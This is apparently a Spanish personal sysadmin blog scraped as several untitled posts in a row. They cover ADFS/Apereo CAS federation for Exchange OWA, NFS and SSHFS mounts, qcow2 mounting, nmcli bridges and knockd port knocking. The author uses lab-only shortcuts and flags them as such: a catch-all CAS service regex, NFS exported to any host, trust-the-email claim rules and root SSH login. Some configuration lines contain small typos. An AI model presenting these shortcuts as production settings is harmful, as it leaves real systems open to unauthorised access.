El principal cambio ha sido el paso a una plataforma estática basada en Hugo, con una infraestructura mucho más sencilla y predecible. El contenido se gestiona directamente desde repositorios Git y el resultado es HTML estático servido sin capas intermedias, lo que reduce complejidad, dependencias y puntos de fallo. Menos servicios, menos mantenimiento y tiempos de carga prácticamente inmediatos.

Junto con el cambio de plataforma, he actualizado el tema visual, optando por un diseño más limpio y funcional. La prioridad ha sido la legibilidad, el rendimiento y una estética discreta, sin artificios innecesarios. La idea es que el diseño acompañe al contenido y no al revés, y que el blog sea cómodo tanto para leer como para escribir.

A nivel de despliegue, el sitio se publica directamente desde código, separando claramente las fuentes del contenido generado. El resultado final se sirve como contenido estático, con dominio propio y HTTPS automático, eliminando dependencias dinámicas y facilitando la portabilidad del sitio en el futuro.

Este rediseño no implica una vuelta con una frecuencia fija de publicación. La intención es retomar el blog con calma, escribiendo cuando tenga algo que merezca la pena documentar o compartir. Las entradas serán previsiblemente esporádicas, en muchos casos técnicas, otras más personales, y otras simplemente notas o reflexiones que me resulte útil dejar por escrito.

El blog sigue siendo, ante todo, un espacio personal. Este cambio es una forma de simplificarlo, mantenerlo vivo y dejarlo listo para cuando vuelva a apetecer escribir.

Seguimos.

Así que hoy vamos a ver cómo integrar nuestro SSO de cabecera con esta herramienta a través de un módulo de Apache y de paso vamos a proveerle de un proxy inverso que nos dé encriptación TLS de las comunicaciones.

Listado de episodios

• Parte 1.

Esquema del laboratorio

Como siempre, el primer paso es detallar nuestra arquitectura.

Como plataforma de virtualización se ha utilizado KVM sobre Debian 11 pero se puede hacer con cualquier otra como VirtualBox, VMWare o Hyper-V.

Todos los servidores están desplegados sobre CentOS 7.9 de 64 bits excepto el desktop que es una Debian 11 de 64 bits. En cuanto al resto de componentes:

• El Apache desplegado es el propio del repositorio estándar de CentOS.
• Rundeck Community se ha desplegado en la version 4.7.0.
• 389DS se ha desplegado en la versión 1.3.10.
• Apereo CAS se ha desplegado desde la plantilla de CAS overlay en su versión 6.6.0.

Para el direccionamiento de red se ha usado un segmento de red de clase C en el segmente 192.168.122.0/24 con direccionamiento estático asignado a las máquinas.

La distribución final de los equipos en el laboratorio será la siguiente:

• Servidor 389DS. 2 GB de RAM, 2 vCPU y 40 GB de disco. Dirección IP: 192.168.122.11.
• Servidor Apereo CAS. 2 GB de RAM, 2vCPU y 40 GB de disco. Dirección IP: 192.168.122.12.
• Servidor Rundeck y Apache. 2 GB de RAM, 2vCPU y 40 GB de disco. Dirección IP: 192.168.122.13.
• Estación de trabajo. 2 GB de RAM, 2vCPU y 40 GB de disco. Dirección IP: 192.168.122.2.

Como siempre voy a suponer que sabéis cómo instalar los sistemas operativos, 389DS, Apereo CAS y Rundeck por lo que no voy a explicar esta parte. Al fin y al cabo si estáis leyendo esto entiendo que si estás leyendo este artículo es porque ya sabes todo esto.

Hasta el siguiente episodio.

Activar el modulo NBD

Lo primero es cargar el módulo NBD que nos permitirá conectar el fichero qcow2 como un dispositivo de disco más del sistema.

{% highlight bash %}

igalvit@server:/vms/kvm$ sudo modprobe nbd max_part=8

{% endhighlight %}

Montar el fichero qcow2

Una vez que ya tenemos el módulo cargado tenemos que conectar el fichero qcow2, en mi caso se trata de un disco virtual de una máquina CentOS 7.

{% highlight bash %}

igalvit@server:/vms/kvm$ sudo qemu-nbd –connect=/dev/nbd0 /vms/kvm/centos7.qcow2

{% endhighlight %}

Ver las particiones disponibles

En este punto ya hemos montado el disco pero no sabemos qué contiene, así que vamos a visualizarlo para posteriormente elegir la partición que nos interesa.

{% highlight bash %}

igalvit@server:/vms/kvm$ sudo fdisk /dev/nbd0 -l Disco /dev/nbd0: 20 GiB, 21474836480 bytes, 41943040 sectores Unidades: sectores de 1 * 512 = 512 bytes Tamaño de sector (lógico/físico): 512 bytes / 512 bytes Tamaño de E/S (mínimo/óptimo): 512 bytes / 512 bytes Tipo de etiqueta de disco: dos Identificador del disco: 0x000a1f9c

Dispositivo Inicio Comienzo Final Sectores Tamaño Id Tipo /dev/nbd0p1 * 2048 2099199 2097152 1G 83 Linux /dev/nbd0p2 2099200 41943039 39843840 19G 8e Linux LVM

{% endhighlight %}

Montar la partición

En nuestro caso se trata de un volumen LVM por lo que lleva un poco más de trabajo del habitual.

{% highlight bash %}

igalvit@server:/vms/kvm$ sudo vgscan Found volume group “centos_centos7” using metadata type lvm2 Found volume group “ubuntu_vg” using metadata type lvm2

igalvit@server:/vms/kvm$ sudo vgchange -ay centos_centos7 2 logical volume(s) in volume group “centos_centos7” now active

igalvit@server:/vms/kvm$ sudo lvs LV VG Attr LSize Pool Origin Data% Meta% Move Log Cpy%Sync Convert root centos_centos7 -wi-a—– <17,00g
swap centos_centos7 -wi-a—– 2,00g
root ubuntu_vg -wi-ao—- 921,00g
swap ubuntu_vg -wi-ao—- <9,28g

igalvit@server:/vms/kvm$ sudo mount /dev/centos_centos7/root /mnt -o ro,user

{% endhighlight %}

Visualizar el contenido de un fichero

Como esto es una prueba no vamos a hacer nada complicado, simplemente vamos a visualizar el fichero de la versión de la distribución de CentOS instalada.

{% highlight bash %}

igalvit@server:/vms/kvm$ cd /mnt

igalvit@server:/mnt$ ls bin dev home lib64 mnt proc run srv tmp var boot etc lib media opt root sbin sys usr

igalvit@server:/mnt$ cat etc/redhat-release CentOS Linux release 7.9.2009 (Core)

{% endhighlight %}

Desmontarlo todo

Una vez terminada la tareas ha llegado la hora de recoger velas.

{% highlight bash %}

igalvit@server:/$ sudo umount /mnt

igalvit@server:/$ sudo vgchange -an centos_centos7 0 logical volume(s) in volume group “centos_centos7” now active

igalvit@server:/$ sudo qemu-nbd –disconnect /dev/nbd0 /dev/nbd0 disconnected

{% endhighlight %}

Y con esto damos por finalizado este artículo.

Acceso al OWA

El acceso al OWA lo haremos como siempre, accediendo por la URL que hayamos definido para este servicio que en nuestro caso es https://exlab.olimpo.lab/owa.

Cuando accedamos en vez de mostrarnos el formulario clásico del OWA veremos una página llamada Home Realm Discovery donde deberemos seleccionar el proveedor que vamos a usar para autenticarnos, que en nuestro caso será apereolab.olimpo.lab.

Al hacer eso accederemos al formulario del CAS donde introducieremos las credenciales de acceso. Bastante sencillo, ¿no?

Pues vamos a introducir una mejora, en realidad a nosotros ya no nos interesa que el usuario se valide mediante Directorio Activo o que tenga que seleccionar un proveedor de identididades por que con estos dos comandos de PowerShell vamos a forzar que el proveedor sea el CAS.

{% highlight posh %} Set-AdfsRelyingPartyTrust -TargetName “Outlook on the web” -ClaimsProviderName “apereolab.olimpo.lab” Set-AdfsRelyingPartyTrust -TargetName “Exchange Control Panel” -ClaimsProviderName “apereolab.olimpo.lab” {% endhighlight %}

Una mejora de última hora

Ya había terminado de redactar este tutorial cuando realizando un par de pruebas encontré la forma de evitar que al cerrar sesión se muestre este mensaje tan feo.

Todo lo que hay que hacer es editar el fichero cas.properties de nuestro CAS y añadir la siguiente línea:

{% highlight conf %} cas.authn.saml-idp.logout.sign-logout-response=true {% endhighlight %}

Reiniciamos el CAS y listo, problema solucionado.

Y con esto damos por terminado este tutorial. Cualquier comentario, ya sabéis, a través de mis redes sociales.

• /etc/cas/config/cas.properties.
• /etc/cas/services/cas_saml-100.json.
• /etc/cas/services/adfs-101.json.
• /etc/cas/metadata/adfs-metadata.xml.

Antes de comenzar

En el fichero build.gradle del CAS Overlay se han añadido las implementaciones de IDP, JSON Service Registry y LDAP. Posteriormente hemos ejecutado el comando ./gradlew clean build para crear el fichero WAR que usaremos. Para ejecutar el CAS hemos usado el comando java -jar build/lib/cas.war

También tendremos que crear un usuario que nos permita autenticar contra Directorio Activo para poder obtener la información de los usuarios. En el caso de este laboratorio el usuario creado es “APEREO USER”.

Fichero /etc/cas/config/cas.properties

{% highlight conf %} as.server.name=https://apereolab.olimpo.lab:8443 cas.server.prefix=${cas.server.name}/cas logging.config=file:/etc/cas/config/log4j2.xml cas.authn.saml-idp.core.entity-id=https://apereolab.olimpo.lab/idp cas.service-registry.json.location: file:/etc/cas/services cas.authn.ldap[0].order=1 cas.authn.ldap[0].name=AD-OLIMPO cas.authn.ldap[0].ldap-url=ldap://exlab.olimpo.lab:389 cas.authn.ldap[0].base-dn=dc=olimpo,dc=lab cas.authn.ldap[0].bind-dn=CN=APEREO USER,OU=Administrators,DC=olimpo,DC=lab cas.authn.ldap[0].bind-credential=<TU_PASSWORD> cas.authn.ldap[0].type=AUTHENTICATED cas.authn.ldap[0].subtreeSearch=true cas.authn.ldap[0].searchFilter=(&(objectClass=person)(sAMAccountName={user})) cas.authn.ldap[0].principalAttributeList=sAMAccountName,mail,userPrincipalName {% endhighlight %}

Fichero /etc/cas/services/cas_saml-100.json

Aquí nuevamente hemos hecho un poco de trampas para que capture cualquier URL.

{% highlight conf %} { “@class”: “org.apereo.cas.services.RegexRegisteredService”, “serviceId”: “http://.+”, “name” : “cas_saml”, “id” : 100, “evaluationOrder” : 100 } {% endhighlight %}

Fichero /etc/cas/services/adfs-101.json

{% highlight conf %} { “@class”: “org.apereo.cas.support.saml.services.SamlRegisteredService”, “serviceId”: “http://fs.olimpo.lab/adfs/services/trust", “name”: “adfs”, “id”: 101, “evaluationOrder”: 101, “description”: “adfs lab service”, “logoutType”: “NONE”, “attributeReleasePolicy”: { “@class”: “org.apereo.cas.services.ReturnAllAttributeReleasePolicy”, }, “usernameAttributeProvider” : { “@class” : “org.apereo.cas.services.PrincipalAttributeRegisteredServiceUsernameProvider”, “usernameAttribute” : “mail”, }, “requiredNameIdFormat”: “urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress”, “metadataLocation”: “/etc/cas/metadata/adfs-metadata.xml”, “signAssertions”: true, “signResponses”: false } {% endhighlight %}

Fichero /etc/cas/metadata/adfs-metadata.xml

Este fichero se obtiene desde ADFS. Concretamente se debe acceder a la ruta https://fs.olimpo.lab/FederationMetadata/2007-06/FederationMetadata.xml y descargar el fichero XML para luego copiarlo en esta ruta.

Directorio /etc/cas/saml

Contiene la definición del IDP, certificado de firma, encriptación, etc.

{% highlight shell %} ls idp-encryption.crt idp-encryption.key idp-metadata.xml idp-signing.crt idp-signing.key metadata-backups {% endhighlight %}

Ya en la parte siguiente veremos algunas pruebas de funcionamiento y algunas mejoras que se pueden hacer para que todo vaya más fluido. Hasta el próximo episodio.

Claims Providers Trusts

Hemos llamado “apereolab.olimpo.lab” a la relación de confianza y para su generación hemos utilizado los metadatos públicados en la siguiente URL del CAS https://apereolab.olimpo.lab:8443/cas/idp/metadata. Esto nos facilita mucho el trabajo porque ya se encarga de realizar el resto de la configuración de esta relación de confianza.

A continuación mostramos dos capturas de pantalla de las dos pestañas más importantes. Recuerda que esta configuración puede variar en función de la configuración que tengas en el Apereo CAS.

La primera captura es de la pestaña Monitoring donde figura la URL de los metadatos junto con la configuración para que se actualice automáticamente la información.

La segunda captura muestra la configuración de la pestaña que contiene los puntos finales o Endpoints.

Acceptance Transform Rules

Solo vamos a tener un regla de transformación de notificación entrante para NameID que va a ser de tipo Email e indicaremos que pase a través todos los valores de las notificaciones. Recuerda que anteriormente ya hemos comentado que nos vamos a fiar que desde Apereo nos van a enviar una dirección de correo electrónico que existe en el Exchange Server y que además va a coincidir con el UPN de un usuario. Sí, es un poco de trampa, lo sé. 😋

Por si quereis echarle un vistazo a la consulta que se genera, es la siguiente:

{% highlight query %} c:[Type == “http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier”, Properties[“http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/format”] == “urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress”] => issue(claim = c); {% endhighlight %}

Y ya con esto nos vemos en el próximo capítulo donde hablaremos de la parte del Apereo CAS.

Vamos a suponer que ya tienes un controlador de dominio operativo, en nuestro caso sobre el dominio OLIMPO y que además ya cuentas con al menos un Exchange Server 2019 en marcha, recuerda que en este laboratorio está integrado en el mismo servidor que el controlador de dominio, es decir, en exlab.olimpo.lab.

Configuración de la federación ADFS

La federación de mi laboratorio está desplegada sobre el servidor adfslab.olimpo.lab y tiene la configuración que se muestra en la siguiente captura. Realmente se trata de la configuración por defecto donde el único cambio reseñable es que la federación tiene como nombre http://fs.olimpo.lab simplemente para diferenciarla del nombre del servidor que la alberga.

Relaying Trust Parties

En nuestro caso se van a generar dos relaciones de relaciones de confianza, una para Outlook Web App (OWA) y la otra para Exchange Control Panel (ECP). A la primera le hemos puesto el nombre de “Outlook on the web” y a la segunda “Exchange Control Panel”.

Recuerda que estos son los únicos servicios de Exchange que se pueden federar ya que tanto EAS como Outlook deben autenticarse mediante Directorio Activo.

Outlook on the web

Como se puede observa la segunda relación de confianza es casi igual que la primera solo que para el ECP. En la siguiente captura se puede observar la configuración de los identificadores que solo es uno hacia la URL del OWA.

En esta captura se puede observar la configuración de los puntos finales. En realidad solo tenemos uno de tipo POST hacia la URL de OWA.

Exchange Control Panel

Como se puede observa la segunda relación de confianza es casi igual que la primera solo que para el ECP. En la siguiente captura se puede observar la configuración de los identificadores que en este caso también es solo uno hacia la URL del ECP.

En esta captura se puede observar la configuración de los puntos finales. Como en el primer caso solo tenemos uno de tipo POST hacia la URL del ECP.

Issuance Transform Rules

En las reglas de transformación de notificaciones tenemos dos reglas, una para el UPN y otra para obtener el PrimarySID mediante uan búsqueda en el repositorio de Directorio Activo. Ambas reglas son exactamente iguales en ambas relaciones de confianza por lo que solo las describiremos una vez.

Regla UPN

En esta primera regla simplemente obtenemos la notificación entrante NameIdentifier que es de tipo email (esto lo veremos cuando configuremos el CAS) y emito una nueva notificación de tipo UPN con el valor que me llega.

{% highlight query %} c:[Type == “http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier”] => issue(Type = “http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn", Value = c.Value); {% endhighlight %}

Es verdad que esto es bastante deficiente y estoy confiando en que me llegue la notificación con una dirección de correo valida y que coincida con el UPN del usuario en Directorio Activo pero recuerda que esto se trata de un laboratorio para aprender.

Regla PrimarySID

En esta segunda regla aprovechamos la notificació de tipo UPN recien creada para localizar el objectSID del usuario buscandolo por el UPN y por la dirección de correo electrónico por si no somos capaces de localizarlo por el UPN.

{% highlight query %} c1:[Type == “http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier”] && c2:[Type == “http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn”] => issue(store = “Active Directory”, types = (“http://schemas.microsoft.com/ws/2008/06/identity/claims/primarysid"), query = “(&(objectCategory=person)(objectClass=user)(|(userPrincipalName={0})(&(mail={0})(!(userPrincipalName={0})))));objectSid;OLIMPO\random”, param = c2.Value); {% endhighlight %}

Aquí nuevamente hacemos un poco de truco porque estamos forzando el dominio del usuario al del laboratorio pero no he sido capaz de hacerlo funcionar de otra manera.

Bueno y con esto nos despedimos hasta el siguiente episodio donde veremos la parte de los proveedores de confianza de notificaciones o Claims Providers Trusts.

Listado de episodios

Comencemos con el listado de todos los artículos relacionados con este tutorial.

• Parte 1.
• Parte 2.
• Parte 3.
• Parte 4.
• Parte 5.

Esquema del laboratorio

Vamos a usar cuatro máquinas virtuales en este laboratorio aunque en un entorno real deberían ser al menos seis ya que he integrado el controlador de dominio con el servidor Exchange y, como no nos hacía falta para un laboratorio, no he publicado ADFS mediante un Web Application Proxy.

Como plataforma de virtualización se ha utilizado WMWare Workstation 16 pero se puede hacer con cualquier otra como VirtualBox, KVM o Hyper-V.

Los servidores Windows se han montado en Windows Server 2022 Standard, la estación de trabajo en Windows 10 Pro y el servidor de Apereo en CentOS 7.9 de 64 bits.

Se ha utilizado Exchange Server 2019 CU11 y para la implementación del CAS de Apereo se ha utilizado la 6.0.0 obtenida del overlay descargado desde su repositorio en GitHub en la URL https://github.com/apereo/cas-overlay-template.

Para el direccionamiento de red se ha usado un segmento de red de clase C en el segmente 172.16.53.0/24 con direccionamiento estático asignado a las máquinas.

La distribución final de los equipos en el laboratorio será la siguiente:

• Controlador de dominio y Exchange Server. 6 GB de RAM, 4 vCPU y dos discos de 100 GB. Dirección IP: 172.16.53.10.
• Servidor ADFS. 4 GB de RAM, 2 vCPU y 60 GB de disco. Dirección IP: 172.16.53.11.
• Servidor Apereo CAS. 2 GB de RAM, 2vCPU y 40 GB de disco. Dirección IP: 172.16.53.13.
• Estación de trabajo. 4 GB de RAM, 2vCPU y 60 GB de disco. Dirección IP: 172.16.53.20.

Voy a dar por supuesto que todos sabemos instalar el sistema operativo tanto de los servidores como de la estación de trabajo y también obtener las ISO de Windows y Exchange Server por lo que no voy a explicar esta parte. Tampoco voy a detallar cómo se instala el controlador de dominio o Exchange Server porque entiendo que si estás leyendo este artículo es porque ya sabes todo esto.

Hasta el siguiente episodio.

Instalación

Lo primero es descargar e instalar dos programas en nuestro equipo Windows. Os dejo los enlaces.

• SSHFS-Win: https://github.com/billziss-gh/sshfs-win
• WinFsp: https://github.com/billziss-gh/winfsp

Son dos paquetes MSI de los de “siguiente, siguiente, finalizar” así que tampoco vamos a perder el tiempo detallando su instalación.

Mapear el directorio personal de un usuario

El mapeo se realiza como cualquier unidad de red de Windows con la excepción de que a la hora de mapear la unidad debemos seguir el siguiente formato:

\\sshfs\<USUARIO>@<MAQUINA>

Nos pedirá nuestras credenciales y ya está hecho.

En esta captura podemos observar los ficheros que contiene mi carpeta personal en el servidor GNU/Linux.

Mapear un directorio dentro del servidor

¿Os acordais del montaje NFS que hemos usado en otras publicaciones? Pues es muy fácil mapear directamente ese directorio como una unidad de red. Tan solo hay que cambiar un poco el comando para que siga este formato.

\\sshfs.r\<USUARIO>@<MAQUINA>\<RUTA>

Aquí podemos ver el contenido de la carpeta datos dentro del explorador de Windows.

Mapear un directorio desde la consola CMD

Pues resulta que también es posible mapear un directorio desde la consola CMD y como esto es algo que me encanta, ahí os dejo un ejemplo.

C:\Users\IEUser>net use X: \\sshfs\ignacio@192.168.2.129
The password is invalid for \\sshfs\ignacio@192.168.2.129.

Enter the user name for 'sshfs': ignacio
Enter the password for sshfs:
The command completed successfully.

C:\Users\IEUser>net use
New connections will be remembered.


Status       Local     Remote                    Network

-------------------------------------------------------------------------------
             X:        \\sshfs\ignacio@192.168.2.129
                                                WinFsp.Np
             Z:        \\sshfs.r\ignacio@192.168.2.129\datos
                                                WinFsp.Np
The command completed successfully.

Y para eliminarlo, igual de sencillo

$ net use X: /delete
X: was deleted successfully.

Más opciones

Tiene algunas opciones más como el uso de claves SSH si no quereis usar contraseñas. Lo mejor es que reviseis la documentación en su página web. Pues eso es todo, amigos.

Instalación

Desde una consola de PowerShell elevada hay que ejecutar el siguiente comando.

{% highlight powershell %} Enable-WindowsOptionalFeature -Online -FeatureName ClientForNFS-Infrastructure {% endhighlight %}

Montaje de solo lectura

Hay que tener en cuenta que esto no funciona desde la consola de PowerShell.

mount -o anon \\<IP_SERVIDOR_NFS>\datos Z:
Z: is now successfully connected to \\<IP_SERVIDOR_NFS>\datos

Montaje de lectura/escritura

Esta parte es bastante engorrosa en Windows. A mí personalmente no me gusta nada y por eso prefiero usar otras alternativas que os mostraré en otra publicación. Pero bueno, para ciertos entornos tiene su utilidad.

Lo primero es usar el comando mount para obtener el UID y GID con el que está montado el recurso NFS.

mount

Local    Remote                                 Properties
-------------------------------------------------------------------------------
Z:       \\<IP_SERVIDOR_NFS>\datos              UID=-2, GID=-2
                                                rsize=262144, wsize=262144
                                                mount=soft, timeout=0.8
                                                retry=1, locking=yes
                                                fileaccess=755, lang=ANSI
                                                casesensitive=no
                                                sec=sys

Hay que crear dos entradas en el registro de Windows para modificar los UID y GID por defecto. Lo ideal es elegir el UID y GDI de un usuario que ya exista en el servidor NFS y de esa manera creamos los ficheros y carpeta con identificadores ya existentes y no veremos valores númericos al visualizar los directorios desde nuestro Linux.

La primera clave se crea con el siguiente comando.

{% highlight powershell %} New-ItemProperty HKLM:\SOFTWARE\Microsoft\ClientForNFS\CurrentVersion\Default -Name AnonymousUID -Value 1000 -PropertyType “DWord”

AnonymousUID : 1000 PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ClientForNFS\CurrentVersion\De fault PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ClientForNFS\CurrentVersion PSChildName : Default PSDrive : HKLM PSProvider : Microsoft.PowerShell.Core\Registry {% endhighlight %}

La segunda clave se crea con el siguiente comando.

{% highlight powershell %} New-ItemProperty HKLM:\SOFTWARE\Microsoft\ClientForNFS\CurrentVersion\Default -Name AnonymousGID -Value 105 -PropertyType “DWord”

AnonymousGID : 1000 PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ClientForNFS\CurrentVersion\De fault PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ClientForNFS\CurrentVersion PSChildName : Default PSDrive : HKLM PSProvider : Microsoft.PowerShell.Core\Registry

PS C:\Windows\system32> {% endhighlight %}

Es necesario reiniciar el equipo para que lea del registro los cambios.

Vamos a ver si esto ha funcionado. Vamos a intentar crear una carpeta llamada folder2.

C:\Users\IEUser>z:

Z:\>dir
 Volume in drive Z has no label.
 Volume Serial Number is 1835-1B2D

 Directory of Z:\

10/22/2021  01:40 PM    <DIR>          .
10/22/2021  01:40 PM    <DIR>          ..
10/22/2021  01:23 PM    <DIR>          folder
               0 File(s)             62 bytes
               3 Dir(s)  37,989,482,496 bytes free

Z:\>mkdir folder2

Z:\>dir
 Volume in drive Z has no label.
 Volume Serial Number is 1835-1B2D

 Directory of Z:\

10/22/2021  01:40 PM    <DIR>          .
10/22/2021  01:40 PM    <DIR>          ..
10/22/2021  01:23 PM    <DIR>          folder
10/22/2021  01:40 PM    <DIR>          folder2
               0 File(s)             98 bytes
               4 Dir(s)  37,989,482,496 bytes free

Y ahora vamos a nuestro servidor NFS a ver si realmente existe y con qué propietario y permisos se ha creado.

{% highlight shell %} [root@centos7 datos]# ll total 0 drwxr-xr-x. 2 root root 22 oct 22 21:23 folder drwxr-xr-x. 2 ignacio ignacio 6 oct 22 21:43 folder2 [root@centos7 datos]# {% endhighlight %}

Pues eso es todo, amigos.

Una nota aclaratoria, esto no pretende ser un tutorial sobre cómo exportar volúmenes NFS sino una breve introducción explicativa para apoyar lo que mostraré en la entrada que crearé en breve. 😁

Instalación servicio NFS

Lo primero que vamos a hacer es instalar los paquetes necesarios para disponer del servicio NFS.

[ignacio@centos7 ~]$ sudo dnf install nfs-utils

Si tenemos habilitado SELinux en el servidor hay que permitir su uso, por lo que hay que ejecutar este comando.

[ignacio@centos7 ~]$ sudo setsebool -P nfs_export_all_ro=1 nfs_export_all_rw=1

El siguiente paso es abrir los puertos necesarios en el cortafuegos. Esto lo hacemos en dos pasos, el primero sirve para añadir las excepciones del servicio y el segundo para forzar el cortafuegos a recargar la configuración que hemos modificado.

[ignacio@centos7 ~]$ sudo firewall-cmd --permanent --add-service nfs
success
[ignacio@centos7 ~]$ sudo firewall-cmd --reload
success

El siguiente paso es habilitar los servicios para que se inicien con el inicio del servidor.

[ignacio@centos7 ~]$ sudo systemctl enable rpcbind nfs-server
Created symlink from /etc/systemd/system/multi-user.target.wants/nfs-server.service to /usr/lib/systemd/system/nfs-server.service.

Y ahora vamos a iniciar los servicios para poder pasar a la parte de configuración.

[ignacio@centos7 ~]$ sudo systemctl start rpcbind nfs-server

Configuración servicio NFS

El primer paso es crear el directorio que vamos a exportar, en mi caso /datos.

mkdir /datos

Como segundo paso vamos a modificar el fichero exports para configurar una exportación del directorio datos en modo lectura para cualquier usuario. En mi caso lo voy a exportar a cualquier IP porque es un laboratorio. Si vais a montar esto en un entorno más serio, por favor, indicad solo la IP desde la que vais a acceder.

cat /etc/exports
/datos *(ro,sync)

En el siguiente paso vamos a forzar la exportación del nuevo volumen mediante el siguiente comando.

root@centos7 ignacio]# exportfs -arv<br />exporting *:/datos</span></p>

Por último, vamos a comprobar que el directorio se encuentra correctamente exportado y accesible.

[ignacio@centos7 ~]$ sudo exportfs -s
/datos *(sync,wdelay,hide,no_subtree_check,sec=sys,ro,secure,root_squash,no_all_squash)

Bueno y con esto hemos terminado por hoy. 🏁

Al utilizar la consola para ejecutar la herramienta ovftool mostraba un error con la librería libnsl.

[ignacio@server MSEdge-Win10-VMware]$ ovftool MSEdge-Win10-VMware.ovf <br />/usr/lib/vmware-ovftool/ovftool.bin: error while loading shared libraries: libnsl.so.1: cannot open shared object file: No such file or directory

Solucionarlo es tan sencillo como instalarla y listo.

Doy por entendido que tienes un conocimiento básico de lo qué es una interfaz puente y que conoces el comando nmcli. En caso contrario, busca un poco por Internet e infórmate de si realmente necesitas crear este tipo de interfaz. 😜

Crear la interfaz puente

El primer paso es crear la interfaz puente mediante el siguiente comando:

$ sudo nmcli con add ifname br0 type bridge con-name br0
Conexión «br0» (9a659c12-715f-4186-add1-fa92a1b7fd25) añadida con éxito.

Ahora tenemos que crear la interfaz esclava que vincularemos con nuestro puente

$ sudo nmcli con add type bridge-slave ifname enp8s0 master br0
Conexión «bridge-slave-enp8s0» (5009e0de-0e28-448c-b1b4-91dd4053232e) añadida con éxito.

En mi caso voy a desactivar spanning tree (STP) porque no me hace falta.

$ sudo nmcli con modify br0 bridge.stp no

Verificamos que todo está configurado como queremos.

$ nmcli -f bridge con show br0
bridge.mac-address:                     -- 
bridge.stp:                             no
bridge.priority:                        32768 
bridge.forward-delay:                   15 
bridge.hello-time:                      2 
bridge.max-age:                         20 
bridge.ageing-time:                     300 
bridge.group-forward-mask:              0 
bridge.multicast-snooping:              sí 
bridge.vlan-filtering:                  no 
bridge.vlan-default-pvid:               1 
bridge.vlans:

Como yo tengo activa la interfaz por defecto que genera Fedora, tengo que desactivarla para poder utilizar la nueva interfaz puente.

$ sudo nmcli con down "Conexión cableada 1"
$ sudo nmcli con up br0
$ nmcli con show
NAME     UUID                                  TYPE      DEVICE  
br0      9a659c12-715f-4186-add1-fa92a1b7fd25  bridge    br0     
virbr0   b994e990-6364-4fa8-afaf-3016881b4cfb  bridge    virbr0  
enp8s0   5009e0de-0e28-448c-b1b4-91dd4053232e  ethernet  enp8s0

Crear la interfaz en VMM

Hay que crear el siguiente fichero XML que nos permitirá definir la interfaz puente en VMM. En mi caso lo he ubicado en la carpeta /tmp y lo he llamado br0.xml

<network>
  <name>br0</name>
  <forward mode="bridge"/>
  <bridge name="br0" />
</network>

Ahora ejecutamos el siguiente comando para importar el fichero XML y que se genere la interfaz puente.

$ sudo virsh net-define /tmp/br0.xml
$ sudo virsh net-start br0

La red br0 se ha iniciado

$ sudo virsh net-autostart br0
La red br0 ha sido marcada para iniciarse automáticamente 
$ sudo virsh net-list --all 
Nombre   Estado   Inicio automático   Persistente 
---------------------------------------------------- 
br0      activo   si                  si 
nat      activo   si                  si

Si abrimos la consola de VMM ya podemos ver que se ha creado la nueva interfaz y está lista para ser usada con nuestras máquinas virtuales.

Máquina servidor

Lo primero es instalar el paquete de EPEL para posteriormente instalar el paquete knock-server. También es necesario instalar libpcap.

[root@knockd ~]# yum install libpcap

[...]

[root@knockd ~]# yum install epel-release

[...]

[root@knockd ~]# yum install knock-server

[...]

El siguiente paso es eliminar de nftables la regla que permite las conexiones SSH remotas mediante el siguiente comando. Ten en cuenta que en mi instalación se usa la zona por defecto llamada public.

[root@knockd ~]# firewall-cmd --zone=public --remove-service=ssh --permanent
success
[root@knockd ~]# firewall-cmd --reload

El siguiente paso es modificar el fichero /etc/knockd.conf y dejarlo con el siguiente contenido. Por favor, cambiad los puertos a otra secuencia. 😜

[options]
        UseSyslog

[opencloseSSH]
        sequence      = 51234:udp,55678:tcp,59124:udp
        seq_timeout   = 15
        tcpflags      = syn,ack
        start_command = /bin/firewall-cmd --zone=public --add-rich-rule "rule family="ipv4" source address="%IP%" service name="ssh" accept"
        cmd_timeout   = 10
        stop_command  = /bin/firewall-cmd --zone=public --remove-rich-rule "rule family="ipv4" source address="%IP%" service name="ssh" accept"

El último paso es habilitar e iniciar el servicio knockd.

sudo systemctl enable knockd && sudo systemctl start knockd

Máquina cliente

En la máquina cliente desde la que vamos a acceder por SSH es necesario instalar el cliente de knock. Al igual que en el servidor es necesario disponer del repositorio EPEL.

yum install epel-release

[...]

yum install knock

[...]

Vamos a una un primer intento de conexión mediante SSH para que veamos que no es posible conectar.

[ignacio@knock-client ~]$ ssh root@192.168.122.186
ssh: connect to host 192.168.122.186 port 22: No route to host
[ignacio@knock-client ~]$  

Ahora vamos a usar el cliente de knock que hemos instalado para hacer la “llamada” y que se abra la puerta.

[root@knock-client ~]# knock -v -d 1 192.168.122.186 51234:udp 55678:tcp 59124:udp
hitting udp 192.168.122.186:51234
hitting tcp 192.168.122.186:55678
hitting udp 192.168.122.186:59124
[root@knock-client ~]# ssh root@192.168.122.186
root@192.168.122.186's password:  
Last failed login: Sun Aug  1 20:51:14 WEST 2021 from knock-client on ssh:notty
Last login: Sun Aug  1 20:25:03 2021 from knock-client
[root@knockd ~]# 

En el fichero messages del servidor podemos ver lo siguiente:

Aug  1 20:51:26 knock-client knockd: 192.168.122.136: opencloseSSH: Stage 1
Aug  1 20:51:26 knock-client knockd: 192.168.122.136: opencloseSSH: Stage 2
Aug  1 20:51:26 knock-client knockd: 192.168.122.136: opencloseSSH: Stage 3
Aug  1 20:51:26 knock-client knockd: 192.168.122.136: opencloseSSH: OPEN SESAME
Aug  1 20:51:26 knock-client knockd: opencloseSSH: running command: /bin/firewall-cmd --zone=public --add-rich-rule "rule family="ipv4" source address="192.168.122.136" service name="ssh" accept"
Aug  1 20:51:31 knock-client systemd-logind: New session 4 of user root.
Aug  1 20:51:31 knock-client systemd: Started Session 4 of user root.
Aug  1 20:51:37 knock-client knockd: 192.168.122.136: opencloseSSH: command timeout
